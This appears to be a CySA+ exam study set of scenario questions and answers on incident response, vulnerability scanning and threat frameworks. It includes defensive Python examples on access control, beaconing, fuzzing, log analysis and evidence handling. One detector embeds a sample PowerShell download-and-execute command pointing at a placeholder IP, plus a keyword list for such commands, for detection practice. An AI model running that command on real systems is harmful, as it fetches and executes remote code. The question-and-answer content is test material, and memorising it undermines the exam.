CySA+


An organization has tasked a business leader with writing an executive summary for a cybersecurity incident report on an incident it recently experienced. What key information should the executive include in the summary to provide a clear and concise overview of the incident?

A brief description of the incident, including the date, time, and scope of the attack

Which of the following is an example of unintentional insider threats regarding cybersecurity?

A contractor who accidentally shares confidential information with unauthorized parties

A retail company is developing an incident response plan and wants to test it to ensure it is effective. The company has decided to conduct a tabletop exercise as part of the preparation phase. What would be a tabletop exercise in this context?

A discussion-based exercise that simulates a cyber incident

Which of the following scenarios is the most accurate example of a stack overflow?

A program tries to store more data in the stack than it can handle.

A security analyst is reviewing a vulnerability report and notices that the report has presented the same vulnerability for the past three months. The report also shows that the vulnerability is present in the same system each month. What does this indicate?

A recurring vulnerability trend

A cyber security specialist has concerns about the potential of advanced persistent threats (APTs) to the organization. Which aspect of APTs should the cyber security specialist be most concerned with?

APTs are interested in maintaining access to networks.

Identifying advanced persistent threats (APTs) helps organizations protect against cyberattacks. Which statement about advanced persistent threats (APTs) is most accurate?

APTs employ anti-forensic techniques to evade detection, making them difficult to identify and prevent.

A security analyst is investigating potential malicious activity associated with an IP address. Which of the following resources can the analyst use to gather information about the reputation of the IP address and determine if there are previous reports of malicious activities associated with it?

AbuseIPDB

An IT administrator wants to improve the organization's cyber defense strategy. The administrator would like to use offensive actions to outmaneuver adversaries, making an attack harder to execute. Which of the following concepts best describes the approach?

Active defense

A retail company's incident response team has noticed a significant increase in the number of alerts generated by its security monitoring tools. The team is concerned that this increase may lead to alert fatigue and impact its ability to detect and respond to real threats. Why is monitoring and managing alert volume an important metric to track? (Select the two best options.)

Alert fatigue reduces the team's effectiveness in detecting and responding to real threats. Monitoring and managing alert volume can improve threat detection accuracy and reduce false positives.

A security manager is responsible for identifying and mitigating insider threats within the organization. The manager has concerns about the potential for intentional insider threats. Which scenario best describes this type of threat?

An employee deliberately causes damage to the organization

A company has detected a security breach in its network, which activated the incident response team. The incident response team must report a detailed timeline of events to provide management with an accurate account of the security breach. The team's report will inform management's decisions about the next steps and help improve future incident response efforts. Why is it important for the team to include these elements in their report?

An incident response timeline helps identify gaps and inefficiencies in the incident response process.

A security team is analyzing their system and network architecture to improve their security posture. In the context of a potential security incident, which aspect should the team prioritize to effectively detect and respond to various types of unauthorized access to critical systems?

Analyzing anomalies in network traffic

A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change?

Application log

An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit?

Broken access control
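The parameter-tampering scenario above, worked through as an added example (not part of the original study set): a profile lookup that trusts the `customer_id` from the URL, beside one that checks the record against the authenticated session before returning it. The customer records, the shape of the session dictionary and the function names are constructed for illustration.

```python
"""Broken access control (IDOR) on a customer-profile lookup: the vulnerable
handler beside a hardened one. Added example; the customer records, the session
dictionary shape and the function names are constructed for illustration."""

# Constructed backing store: customer_id -> profile, including the owning account.
CUSTOMERS = {
    1001: {"owner": "alice", "name": "Alice Example", "email": "alice@example.com", "balance": 1250.00},
    1002: {"owner": "bob", "name": "Bob Example", "email": "bob@example.com", "balance": 87.50},
}


def get_profile_vulnerable(session: dict, customer_id: int) -> dict:
    """Returns whatever record the URL parameter names. The session is available
    but never consulted, so changing ?id=1002 to ?id=1001 discloses another customer."""
    return CUSTOMERS[customer_id]


def get_profile_hardened(session: dict, customer_id: int) -> dict:
    """Authorisation at the point of access: the caller must be authenticated and
    must own the record (or hold an admin role)."""
    user = session.get("user")
    if not user:
        raise PermissionError("authentication required")
    record = CUSTOMERS.get(customer_id)
    # 'missing' and 'not yours' produce the same error, so valid IDs cannot be
    # enumerated by telling the two cases apart.
    if record is None or (record["owner"] != user and "admin" not in session.get("roles", ())):
        raise PermissionError("access denied")
    return record


def bob_requests(lookup, customer_id: int):
    """Bob, authenticated as a plain customer, tampers with the ID parameter.
    Returns the record on success or None when access is refused."""
    session = {"user": "bob", "roles": ("customer",)}
    try:
        return lookup(session, customer_id)
    except PermissionError:
        return None
```

The check belongs on every object access, not only on the page that lists the IDs: an attacker who can guess or increment an identifier never visits the listing page.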

A hacker finds a vulnerability in a web server within a target organization. By sending specially crafted input to the HTTP service, the hacker exceeds the program's memory capacity and causes the web server to execute arbitrary commands. What type of attack is this?

Buffer overflow

An organization seeks to improve its threat intelligence capabilities by leveraging the MITRE ATT&CK matrices. How can this resource's unique IDs and tactic categories help the organization recognize and protect against specific attacks?

By identifying patterns in TTPs used by threat groups and developing defense strategies

A company has recently discovered that its network has become slow and unreliable, with frequent outages and disruptions. An IT staff member suspects that rogue devices on the network could be causing these issues. What is the best way to identify rogue devices on a network? (Select the three best options.)

Conduct network scans using tools like Nmap to identify active devices on the network. Use intrusion detection systems (IDS) to monitor network traffic and identify devices that do not belong on the network. Utilize Network Access Control (NAC) solutions to authenticate and validate devices before granting network access.

A recently hired project manager is taking over the organization's operational control responsibilities. Which control responsibility would the project manager assume in a cybersecurity environment?

Conducting background checks on new employees

A newly hired cybersecurity manager oversees the organization's operational control responsibilities. Which of the following is an example of this responsibility?

Creating a strong password policy for employees to follow

A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe?

Cryptographic failures

A network administrator receives an alert that the system has detected a cyberattack on the organization's network. The administrator needs to quickly identify the type of attack and take appropriate action to mitigate the threat. What methodology framework can the administrator use to analyze the stages of a cyberattack and understand how to defend against it?

Cyber kill chain

Which of the following are valid mitigation techniques to combat data poisoning? (Select the three best options.)

Data validation; data diversity; anomaly detection

A financial institution is experiencing persistent cyberattacks from unknown sources. What active defense approach can the company deploy to outmaneuver the attackers and gain insights into their methodologies?

Deploy honeypots to attract and identify potential attackers

A network administrator is responsible for ensuring the security of an organization's network. The organization has tasked the administrator with implementing vulnerability scanning methods and concepts to identify potential vulnerabilities. As part of their efforts, the administrator has decided to segment the network. What scanning method would be most helpful in identifying potential vulnerabilities in the segmented network?

Device fingerprinting

A network administrator has noticed a series of unusual network activities that indicate a possible cyberattack. The administrator analyzes the event using a framework that explores the relationships among four core features: adversary, capability, infrastructure, and victim. Which of the following methodologies would the network administrator use for the review?

Diamond model of intrusion analysis

An organization has implemented a system to detect beacon activity by analyzing metadata about all sessions established or attempted. However, this approach can produce many false positives since many legitimate applications also use beaconing. What are some indicators to distinguish between suspicious and legitimate beaconing activity, and why is it important to carefully analyze this type of activity to avoid false positives?

Endpoints, rate and timing of attempts, and size of response packets
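The beacon-analysis item above, as an added example that is not from the original study set: session metadata grouped per source/destination pair, with the regularity of the connection intervals and of the response sizes measured as a coefficient of variation, and a list of known polling endpoints used to suppress expected beaconing. The session records, IP addresses, hostnames and thresholds are constructed for illustration.

```python
"""Beacon detection over session metadata. Added example; every record below is
constructed, as are the allow-listed endpoint and the thresholds."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed session records: (epoch_seconds, src_ip, dst_host, response_bytes).
SESSIONS = [
    # Check-ins every ~60 s with a near-constant response size: the beacon profile.
    *[(1_700_000_000 + 60 * i + jitter, "10.0.0.5", "203.0.113.10", 98 + (i % 3))
      for i, jitter in enumerate([0, 1, -1, 0, 2, -1, 0, 1, 0, -2])],
    # Regular polling of an allow-listed update host: same rhythm, but expected.
    *[(1_700_000_000 + 300 * i, "10.0.0.5", "update.example.internal", 512)
      for i in range(10)],
    # Interactive browsing: irregular timing and widely varying sizes.
    *[(1_700_000_000 + t, "10.0.0.5", "198.51.100.20", size)
      for t, size in [(3, 14800), (9, 2200), (41, 93000), (45, 650),
                      (300, 40100), (302, 1200), (903, 7600)]],
]

# Endpoints whose periodic traffic is understood (software updates, monitoring agents).
KNOWN_BEACONING_ENDPOINTS = {"update.example.internal"}


def _cv(values):
    """Coefficient of variation: standard deviation relative to the mean."""
    m = mean(values)
    return pstdev(values) / m if m else 0.0


def score_beacons(sessions, min_sessions=6, max_interval_cv=0.10, max_size_cv=0.10):
    """Returns (per-pair findings, list of pairs that look like unexplained beacons).
    A pair is suspicious when it has enough sessions, its inter-session timing and
    response sizes are both nearly constant, and the endpoint is not a known poller."""
    by_pair = defaultdict(list)
    for ts, src, dst, size in sessions:
        by_pair[(src, dst)].append((ts, size))

    findings = {}
    for (src, dst), rows in by_pair.items():
        rows.sort()
        if len(rows) < min_sessions:
            continue
        intervals = [b[0] - a[0] for a, b in zip(rows, rows[1:])]
        sizes = [s for _, s in rows]
        findings[(src, dst)] = {
            "sessions": len(rows),
            "interval_cv": round(_cv(intervals), 3),
            "size_cv": round(_cv(sizes), 3),
            "known_endpoint": dst in KNOWN_BEACONING_ENDPOINTS,
        }

    suspicious = [pair for pair, f in findings.items()
                  if f["interval_cv"] <= max_interval_cv
                  and f["size_cv"] <= max_size_cv
                  and not f["known_endpoint"]]
    return findings, suspicious
```

The update host scores exactly like the implant on timing and size; only the endpoint context separates the two, which is why the endpoint list is part of the indicator set and not an afterthought. Real implants add jitter on purpose, so the interval threshold is a tuning knob rather than a constant.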

A major airline company has suffered a cyberattack that has compromised sensitive customer information, including credit card details and travel itineraries. The company's incident response team has been working to mitigate the damage and contain the breach, but they must also address regulatory reporting requirements. The airline is subject to regulations from multiple governing bodies, including aviation authorities and data protection agencies, and must report the incident within a specific timeframe. What is the importance of regulatory reporting in the airline sector for incident response reporting and communication?

Failure to comply with regulatory reporting requirements can result in hefty fines and legal penalties.

An organization is reviewing its incident response plan and wants to improve its overall security posture by streamlining the authentication process for its employees during a security incident. Which of the following approaches can help achieve this goal without compromising security?

Federation

A company needs to understand the vulnerabilities associated with one of its new web applications. The company requests that the cyber security team identify any issues with the application's input handling. Which method should the team use to best achieve the company's request?

Fuzzing
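A small mutation fuzzer for the input-handling question above, as an added example that is not from the original study set. The target is a constructed toy record parser whose documented contract is "return a dict or raise ValueError"; the fuzzer mutates valid seeds and reports any exception that falls outside that contract. The parser format, the seeds and the mutation set are assumptions for illustration.

```python
"""Mutation fuzzing of an input handler. Added example with a constructed toy
parser; the contract under test is 'returns a dict or raises ValueError', so any
other exception type is an unhandled-input bug worth reporting."""
import random
import string

PRINTABLE = string.ascii_letters + string.digits + "=;:, \"'<>\\"
SEEDS = ["name=alice;age=30", "age=41"]        # constructed valid inputs to mutate


def parse_record_vulnerable(data: str) -> dict:
    """Parses 'key=value;key=value'. Bug: it assumes an 'age' key exists, so a
    record without one escapes with KeyError instead of the documented ValueError."""
    record = {}
    for pair in data.split(";"):
        key, value = pair.split("=")           # ValueError on malformed pairs: in contract
        record[key.strip()] = value.strip()
    record["age"] = int(record["age"])         # KeyError if 'age' is missing: out of contract
    return record


def parse_record_hardened(data: str) -> dict:
    """Same format, with every rejection path converted to the documented ValueError."""
    record = {}
    for pair in data.split(";"):
        key, sep, value = pair.partition("=")
        if not sep or not key.strip():
            raise ValueError(f"malformed pair: {pair!r}")
        record[key.strip()] = value.strip()
    if "age" not in record:
        raise ValueError("missing required field 'age'")
    record["age"] = int(record["age"])         # still ValueError on non-numeric input
    return record


def mutate(seed: str, rng: random.Random) -> str:
    """One random mutation: replace, delete or insert a character, or duplicate a slice."""
    if not seed:
        return rng.choice(PRINTABLE)
    i = rng.randrange(len(seed))
    op = rng.randrange(4)
    if op == 0:
        return seed[:i] + rng.choice(PRINTABLE) + seed[i + 1:]
    if op == 1:
        return seed[:i] + seed[i + 1:]
    if op == 2:
        return seed[:i] + rng.choice(PRINTABLE) + seed[i:]
    j = rng.randrange(i, len(seed) + 1)
    return seed[:j] + seed[i:j] + seed[j:]


def fuzz(target, seeds, iterations=500, rng_seed=1, allowed=(ValueError,)):
    """Runs mutated inputs through `target`; returns {exception type name: first input
    that triggered it} for exceptions outside the `allowed` contract."""
    rng = random.Random(rng_seed)             # fixed seed keeps the run reproducible
    crashes = {}
    for _ in range(iterations):
        sample = mutate(rng.choice(seeds), rng)
        try:
            target(sample)
        except allowed:
            continue                           # documented rejection: not a finding
        except Exception as exc:               # anything else is a crash
            crashes.setdefault(type(exc).__name__, sample)
    return crashes
```

In a compiled target the equivalent of the "out of contract" exception is a signal or sanitizer report; the structure of the loop (mutate, run, classify, keep the reproducer) is the same.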

An activist group that advocates for the protection of animal rights has recently begun carrying out cyberattacks against large food production companies. They have defaced websites, stolen confidential data, and disrupted operations. What type of threat actor group is this?

Hacktivist

During an incident response, a security team has identified a potential data breach on a company's network. Which of the following is a critical step in scoping the incident?

Identifying the affected assets and systems

After detecting a security breach in one of the systems, the network administrator at a large organization faces a highly complex situation that does not allow them to follow the incident response process outlined in the manual. What would be the most appropriate course of action for the network administrator to take if applying compensating controls?

Implement an alternative control that achieves the same security objective through a different method

Which of the following is an example of a technical control in cybersecurity?

Implementing firewalls and antivirus software to prevent unauthorized access and malware infections

A company has decided to implement multifactor authentication (MFA) for its employees to access company systems remotely. What is the primary benefit of using MFA in this scenario?

Improving the security of company systems by adding an extra layer of protection

A cybersecurity team performs a security assessment of a large company's network infrastructure. The team decides to use a passive discovery approach to identify systems, services, and protocols in use on the network. Which of the following methods of passive discovery would be the most effective for the team to use, and how does it work?

Inspecting network traffic using a packet sniffer to identify protocols in use and traffic patterns

A security analyst wants to use a web application scanner to test the security of a web application. Which of the following is a feature of Burp Suite that could support the security analyst's requirements?

Intercepting and modifying HTTP requests and responses

A network administrator reviews the logs in the security information and event management (SIEM) system and notices an alert for anomalous behavior in a relevant log. What should be the next step in the incident response activities, specifically related to Indicators of Compromise (IoCs)?

Investigate the alert further to determine the cause of the anomalous behavior

An IT professional is responsible for identifying potential threats within the organization's isolated network. The professional wants to focus on vulnerabilities that attackers could exploit, even if not connected to the internet. What focus area should the IT professional focus on to achieve this goal?

Isolated network hunting

A company recently suffered a security incident where customer data breaches occurred, causing significant reputational damage. In response, the company's management has requested a report on the incident response team's performance. Within this context, why is measuring the mean time to remediate important for incident response reporting and communication?

It allows the company to track how long remediation takes once an incident is detected, so response and recovery times can be improved.

A financial company has experienced a security breach, and cybersecurity professionals need to analyze data to prioritize vulnerabilities and identify the attack vectors used by cybercriminals. How can the Common Vulnerability Scoring System (CVSS) aid in this process?

It can help to prioritize remediation steps to prevent security incidents.

A company's vulnerability management team has identified a critical vulnerability in its server software. The team has created an action plan to address the vulnerability and has identified patching as a key part of the plan. Why is patching an important part of the action plan?

It can prevent attackers from exploiting the vulnerability and causing damage to the company.

A retail company has recently experienced a data breach and wants to perform a root cause analysis to determine how the breach occurred. Why is a root cause analysis important for incident response reporting and communication in the retail sector? (Select the two best options.)

It helps identify the underlying cause of an incident and prevents similar incidents from occurring in the future. It provides insight into the effectiveness of security controls and identifies areas for improvement.

A large company is considering using virtualization technology to isolate and protect critical systems from potential cyberattacks. What is the benefit of this technology in cybersecurity?

It makes it harder for attackers to breach the network by creating multiple virtual machines secured independently.

A financial company has experienced a data breach that resulted in the exposure of sensitive customer information. As part of the incident response process, the company must document the details of the 5Ws of the incident, including who was involved, what happened, when it occurred, where it took place, and why it happened. What is the significance of recording the 5Ws of an incident in the incident response reporting process?

It provides a clear and complete understanding of the incident.

A retail company is in the process of developing an incident response plan. As part of the preparation phase, the company's security team is creating playbooks to guide incident response procedures. What is the primary benefit the company will realize by developing this tool?

It provides a framework for efficient incident response procedures.

A large corporation seeks to minimize human engagement in its cybersecurity processes. Which of the following is the most direct cybersecurity benefit the corporation will receive by automating those processes?

It reduces the risk of human error and increases the speed of response.

A security analyst is scripting a process to collect log data from multiple sources in a network. The analyst needs to choose between using JSON or XML as the format for the script. In this scenario, why would the security analyst choose to use JSON instead of XML for the scripting process?

JSON is lighter-weight than XML, so large data sets parse faster and the script stays simpler.

During an investigation into a cybersecurity incident, what steps should the organization take to ensure that host devices and media taken from the crime scene are properly labeled, bagged, and sealed?

Label the devices and media, seal them in tamper-evident antistatic shielding bags, and record the evidence collection details on a chain-of-custody form

A company has contracted a third party to develop a proprietary software application to manage its manufacturing processes. What is a common inhibitor to vulnerability management reporting and communication in this context, specifically for organizations with proprietary systems? (Select the three best options.)

Lack of understanding of the application's underlying architecture and dependencies; fear of revealing proprietary information to external parties; lack of resources to test and remediate vulnerabilities in a proprietary system

An organization has tasked a network administrator with analyzing a recent cyberattack on the system. They want to understand the attack methodology used by the attackers. Which framework can the administrator use to access a database of known tactics, techniques, and procedures (TTPs) used by different threat actor groups?

MITRE ATT&CK

A network administrator has detected irregular P2P communication on the network. What could be the possible cause of this communication?

Malware infection or botnet activity

A company's security monitoring system logs and alerts the security team when suspicious activity occurs. The security administrator discovers that a recent attack was not detected until two weeks after it occurred. Which incident response metric does this affect?

Mean time to detect (MTTD)

A company has discovered that sensitive data was leaked to the public. The IT team needs to assess the potential vulnerabilities and identify the attack vectors that could have led to this incident. Which methodology framework can the team use to guide their testing process?

Open Source Security Testing Methodology Manual (OSSTMM)

A company plans to conduct a security test on its systems to identify vulnerabilities and weaknesses. The company has decided to use a framework to ensure they conduct testing thoroughly and consistently. Which methodology framework could the company use to conduct security testing that provides detailed procedures for managing operational security?

Open Source Security Testing Methodology Manual (OSSTMM)

A security administrator wants to scan the company's network for vulnerabilities. Which of these scanners is open-source software forked from the Nessus codebase?

OpenVAS

A system administrator is responsible for maintaining the security and integrity of a company's servers. One critical task involves the system administrator keeping software current and protected from known vulnerabilities. What concept describes this critical task?

Patch management

A company is planning to deploy its applications and services in a cloud environment, with a strong emphasis on ensuring security and maintaining control over its data. Considering these requirements, which cloud deployment model would be most suitable?

Private cloud deployment model

An organization has tasked a network administrator with improving the security of its web applications. The administrator decides to consult the OWASP resources to identify and fix vulnerabilities. Which of the following are key goals of these resources? (Select the three best options.)

Promote open-source software and information sharing; provide training and other resources to improve software security; create awareness of risks and vulnerabilities in software applications

A company has employees working from different sites and needs to ensure secure access to company resources. Which of the following is the primary benefit of using Secure Access Service Edge (SASE) to provide secure access to company resources?

Providing end-to-end protection for all users, regardless of location

A company has tasked a cybersecurity consultant with evaluating new software for vulnerabilities. The consultant wants to understand the methods for uncovering how the software operates. Which of the following methods is most appropriate for this task?

Reverse engineering

An IT professional is responsible for their organization's patch and configuration management. The organization has assigned the professional the task of ensuring that patching and configuration changes get completed safely and efficiently. The professional is also responsible for ensuring rollback plans are in place in case of any problems during the patching or configuration change process. Which of the following statements is true about the IT professional's responsibilities to manage the necessary rollback plans?

Rollback plans are necessary for patching and configuration changes during maintenance windows.

A security consultant uses a software tool to perform security tests for an organization's cloud presence. Which tool will the consultant use in an attempt to gain a list of all virtual machine and storage container instances?

ScoutSuite

An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task?

Shell script

A security analyst is developing a Python script to analyze plain text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concepts the analyst needs to implement in the Python script to detect obfuscated text? (Select the two best options.)

String manipulation; regular expressions
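The two concepts above combined in one script, as an added example that is not from the original study set: regular expressions find encoded PowerShell arguments, hex-escaped strings and long base64-like tokens in plain-text log lines, and string manipulation (base64 and UTF-16LE decoding, an entropy measure) turns the matches into something a keyword rule can judge. The log lines are constructed, and the encoded payload is built inside the script for the sample rather than captured from a host.

```python
"""Detecting obfuscated content in plain-text logs with regular expressions and
string manipulation. Added example; the log lines are constructed and the encoded
payload is generated here for the sample, not captured from a real system."""
import base64
import binascii
import math
import re
from collections import Counter

# -EncodedCommand / -enc / -e followed by a base64 blob (PowerShell expects UTF-16LE inside).
ENCODED_CMD = re.compile(r"(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Runs of \xNN or 0xNN escapes: a common way to hide strings from keyword matching.
HEX_ESCAPES = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}|(?:0x[0-9a-fA-F]{2}[,\s]+){3,}0x[0-9a-fA-F]{2}")
# Long base64-looking tokens anywhere in the line; judged by entropy below.
LONG_TOKEN = re.compile(r"[A-Za-z0-9+/=]{40,}")
# Keywords worth an alert once text has been decoded.
SUSPICIOUS = re.compile(r"invoke-expression|\biex\b|downloadstring|frombase64string|net\.webclient",
                        re.IGNORECASE)


def shannon_entropy(text: str) -> float:
    """Bits per character: random base64 sits near 6, English prose near 4."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_powershell_b64(token: str):
    """Base64 -> UTF-16LE text, as PowerShell does; None if it is not valid base64."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def analyze_line(line: str) -> list:
    """Returns (kind, detail) findings for one log line; empty list when nothing matches."""
    findings = []
    seen = set()
    for match in ENCODED_CMD.finditer(line):
        token = match.group(1)
        seen.add(token)
        findings.append(("encoded-powershell", token[:24] + "..."))
        decoded = decode_powershell_b64(token)
        if decoded and SUSPICIOUS.search(decoded):
            findings.append(("decoded-suspicious", decoded.strip()))
    hex_match = HEX_ESCAPES.search(line)
    if hex_match:
        findings.append(("hex-escape", hex_match.group(0)))
    for token in LONG_TOKEN.findall(line):
        if token not in seen and shannon_entropy(token) >= 4.5:
            findings.append(("high-entropy-token", f"{len(token)} chars"))
    return findings


# Constructed sample: the encoded command is generated from a plaintext payload.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    f"4688 New Process: powershell.exe -nop -w hidden -EncodedCommand {ENCODED}",
    r"4688 New Process: cmd.exe /c echo \x68\x74\x74\x70\x3a\x2f\x2f\x32\x30\x33 > u.txt",
    "4624 Logon: user alice from 10.0.0.5 type 10",
]
```

The decode step is what makes the rule useful: keyword matching on the raw line would never see `DownloadString`, because the attacker encoded it precisely to avoid that.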

A cybersecurity analyst who works for a large corporation has been analyzing a recent cyber attack that targeted his company's network. The analyst is using both the Cyber Kill Chain and Open Source Security Testing Methodology Manual (OSSTMM) frameworks to analyze the attack. What is the main difference between the Cyber Kill Chain and OSSTMM frameworks in incident response and management?

The Cyber Kill Chain focuses on identifying and analyzing the stages of a cyber attack, while OSSTMM focuses on assessing the maturity level of an organization's security practices.

A cyber technician explores special considerations for scanning after finding gaps in the organization's network. Which of the following is a TRUE statement regarding performance considerations for vulnerability scanning?

The accuracy of the scan results depends on the quality of the vulnerability database used.

A security analyst who has discovered a data breach in an organization's network identified the source of the attack and now must remediate the issue. What is the best course of action for the analyst to take to remediate the issue?

The analyst should patch the affected system to prevent the vulnerability from being exploited again

A company has identified multiple vulnerabilities in its systems, including one critical vulnerability that could potentially cause significant damage if exploited. Which vulnerability should the security team prioritize for remediation?

The critical vulnerability

A large company has recently discovered a vulnerability in its system. After analyzing the data, the company must prioritize the vulnerabilities based on exploitability and weaponization. Which of the following would be important for the company to consider when analyzing the data to achieve their requirements? (Select the two best options.)

The level of sophistication of threat actors targeting the vulnerability; the availability of patches for the vulnerability

A company's security team has identified several indicators of compromise (IoCs) in its system logs, including unusual network traffic and the presence of a suspicious file on a system. What actions can the team take to respond to these IoCs? (Select the two best options.)

The team can quarantine and analyze the suspicious file to identify any malware or other security threats it may contain. The team can conduct network traffic analysis to identify the source and destination of the unusual traffic and any associated systems and users.

A company wants to implement vulnerability scanning methods for its IT systems. The company considers using industry frameworks and wants to implement the Center for Internet Security (CIS) benchmarks. What are the benefits of using the CIS Benchmarks for the company's requirements?

They provide specific guidance on how to improve an organization's security posture and reduce overall risk.

A financial institution has detected a potential data breach and has activated its incident response team. As part of the investigation, the team analyzes data and logs. What is the primary purpose of this type of analysis?

To determine the scope of the incident and what data may have been compromised

A security team member detects a potential security breach and begins investigating it. The team member must perform incident response activities during the investigation, including detection and analysis, evidence acquisition, and validating data integrity. What is the purpose of validating data integrity in this scenario?

To ensure no tampering has occurred with the evidence collected
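The evidence-handling items above (labeling, bagging and the chain-of-custody form; validating data integrity during acquisition) share this added example, which is not from the original study set: a hash taken at collection, a custody record appended on every hand-off with the hash re-verified at that point, and an independent check before analysis. The evidence bytes, case identifier, names and record layout are constructed for illustration.

```python
"""Evidence acquisition with integrity hashes and a chain-of-custody record.
Added example; the evidence bytes, case number, names and record layout are
constructed for illustration."""
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def acquire(item_label: str, data: bytes, collector: str, case_id: str) -> dict:
    """Creates the chain-of-custody entry at the moment of collection. The hash
    recorded here is the reference every later handler must reproduce."""
    return {
        "case_id": case_id,
        "item": item_label,
        "collected_by": collector,
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "sha256": sha256_hex(data),
        "size_bytes": len(data),
        "custody": [],                        # one entry per hand-off, appended below
    }


def transfer(entry: dict, from_person: str, to_person: str, data: bytes) -> bool:
    """Records a hand-off and re-verifies the hash at that point. Returns False,
    and records the mismatch, if the bytes no longer match the acquisition hash."""
    observed = sha256_hex(data)
    intact = observed == entry["sha256"]
    entry["custody"].append({
        "at": datetime.now(timezone.utc).isoformat(),
        "from": from_person,
        "to": to_person,
        "verified_sha256": observed,
        "intact": intact,
    })
    return intact


def verify(entry: dict, data: bytes) -> bool:
    """Independent check, e.g. before analysis or before the item is produced in court."""
    return sha256_hex(data) == entry["sha256"] and len(data) == entry["size_bytes"]


def custody_form(entry: dict) -> str:
    """Serialises the record for the paper or electronic chain-of-custody form."""
    return json.dumps(entry, indent=2)


# Constructed evidence: a small 'disk image' and a copy altered in transit. The
# alteration keeps the size identical, so only the hash reveals it.
ORIGINAL_IMAGE = b"\x00" * 512 + b"EVIDENCE-2024-0042 original sector data" + b"\xff" * 512
TAMPERED_IMAGE = ORIGINAL_IMAGE.replace(b"original", b"modified")
```

Usage in an investigation: `entry = acquire("HDD-01", ORIGINAL_IMAGE, "analyst1", "IR-2024-0042")`, then one `transfer(...)` call per hand-off and `verify(entry, data)` before analysis; `custody_form(entry)` produces the record that accompanies the sealed bag.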

A network administrator for a healthcare organization receives an alert from their security information and event management (SIEM) system indicating a potential breach. Upon further investigation, the administrator discovers that patient data has been accessed and potentially exfiltrated. As a result, the network administrator begins to perform incident response activities, including detection and analysis, evidence acquisition, and legal hold. What is the purpose of evidence acquisition in this scenario?

To preserve findings for use in legal proceedings

A company is implementing a PKI to enhance the security of its communications after a recent series of intercepted emails. What is the purpose of PKI in this instance?

To verify the authenticity of digital documents and the identity of users or devices

A cybersecurity analyst uses the Common Vulnerability Scoring System (CVSS) to evaluate the severity of a vulnerability in a company's software. When using the CVSS to evaluate the severity of a software vulnerability, what specific factors should the analyst consider, and why is CVSS an important tool for IT teams to use? (Select the two best options.)

Type of vulnerability, affected system, and potential impact

A cybersecurity analyst is investigating a suspicious process running on a server and discovers unexpected output and registry anomalies. In analyzing these findings, which two considerations should the analyst prioritize to determine the nature of the issue? (Select the two best options.)

Unexpected output can indicate malware activity. Registry anomalies can be indicative of a malware intrusion.

A security administrator reviews a vulnerability report for the company's network infrastructure. What are the best practices for vulnerability reporting? (Select the three best options.)

Using appropriate tools to identify reporting needs and selecting the best tools for those needs; using automation to make the process more consistent, reliable, efficient, and easy to maintain; developing policies and procedures for generating vulnerability reports on a regular schedule

An airline company has implemented a new security system to monitor its online booking system for suspicious activity, such as multiple failed login attempts or a large number of bookings made quickly. The system uses webhooks to trigger automated responses, such as blocking an IP address or alerting the security team. How can an airline company use webhooks to enhance the security of its online booking system?

Webhooks automate messages an airline company uses to monitor suspicious activity.

A web application developer wants to test the security of an application before deploying it to production. Which of the following is a feature of Zed Attack Proxy (ZAP) that would influence the web application developer's decision?

ZAP can automatically generate a report of all vulnerabilities found in the application.

A company is in the process of implementing a vulnerability scanning program to improve its cyber defenses. The company wants to know which scanning method (agent-based or agentless) would most effectively identify vulnerabilities on its network. What are the advantages of agent-based scanning compared to agentless scanning in this context? (Select the three best options.)

Agent-based scanning, unlike agentless, provides detailed and accurate information through direct access to system resources. Agent-based scanning, compared to agentless, provides continuous and real-time monitoring due to its host presence. Agent-based scanning operates independently of network connectivity, unlike agentless scanning, which requires a stable network connection.

A U.S.-based financial company collects sensitive PII from its customers, including U.S. social security numbers, biometric information, and financial records. What measures can the company take to protect the data from breaches or unauthorized access? (Select the two best options.)

Implement multi-factor authentication; introduce access controls

An IT professional is responsible for implementing vulnerability scanning methods for their organization's network. The organization has tasked the IT professional with deciding whether to use an agent-based or agentless vulnerability scanning method. What factors should the IT professional consider when making this decision? (Select the two best options.)

The size of the network being scanned; the presence of network firewalls

A security analyst needs to automate tasks in a mixed environment with both Windows and Unix-based systems. Which of the following statements accurately differentiates PowerShell and shell scripts in this context?

Both PowerShell and shell scripts are used for automation, but they differ in syntax and are not interchangeable

A network administrator is responsible for securing a large organization's network. The administrator wants to identify potential threats by analyzing network traffic and routine activities. The network administrator believes that focusing on business-critical assets is the most important focus area for threat hunting. Which of the following is a reason to prioritize this focus area?

Attackers often target important assets like databases, servers, or applications.

A large company's cybersecurity team has identified several vulnerabilities in the network, such as a zero-day threat not yet exploited. How should the team prioritize which vulnerabilities to address first?

Prioritize the vulnerabilities that affect critical systems or data

A network administrator analyzes data and prioritizes vulnerabilities to ensure the organization's security. The administrator has received an alert regarding a zero-day vulnerability in one of the organization's critical systems. What factors should the network administrator consider to prioritize this vulnerability? (Select the two best options.)

Impact of the vulnerability; level of sophistication of threat actors

An organization has tasked an IT team with implementing vulnerability scanning methods and concepts. They are considering different industry frameworks to use. Which of the following is a not-for-profit organization that focuses on web application security?

OWASP

A company has just experienced a cyberattack, and its incident response team is in the post-incident activity phase. What is the purpose of forensic analysis during this phase?

To identify the cause, scope, and impact of the incident

